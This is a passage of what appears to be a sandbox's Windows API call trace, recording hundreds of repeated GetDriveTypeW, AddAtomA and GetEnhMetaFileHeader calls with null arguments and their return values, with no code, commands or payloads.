GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.758] AddAtomA (lpString=0x0) returned 0x0 [0095.758] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.759] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.759] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.760] AddAtomA (lpString=0x0) returned 0x0 [0095.760] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.761] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.761] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.762] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.762] AddAtomA (lpString=0x0) returned 0x0 [0095.763] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.763] AddAtomA (lpString=0x0) returned 0x0 [0095.763] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.763] AddAtomA (lpString=0x0) returned 0x0 [0095.763] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.764] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.765] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.766] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0095.767] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 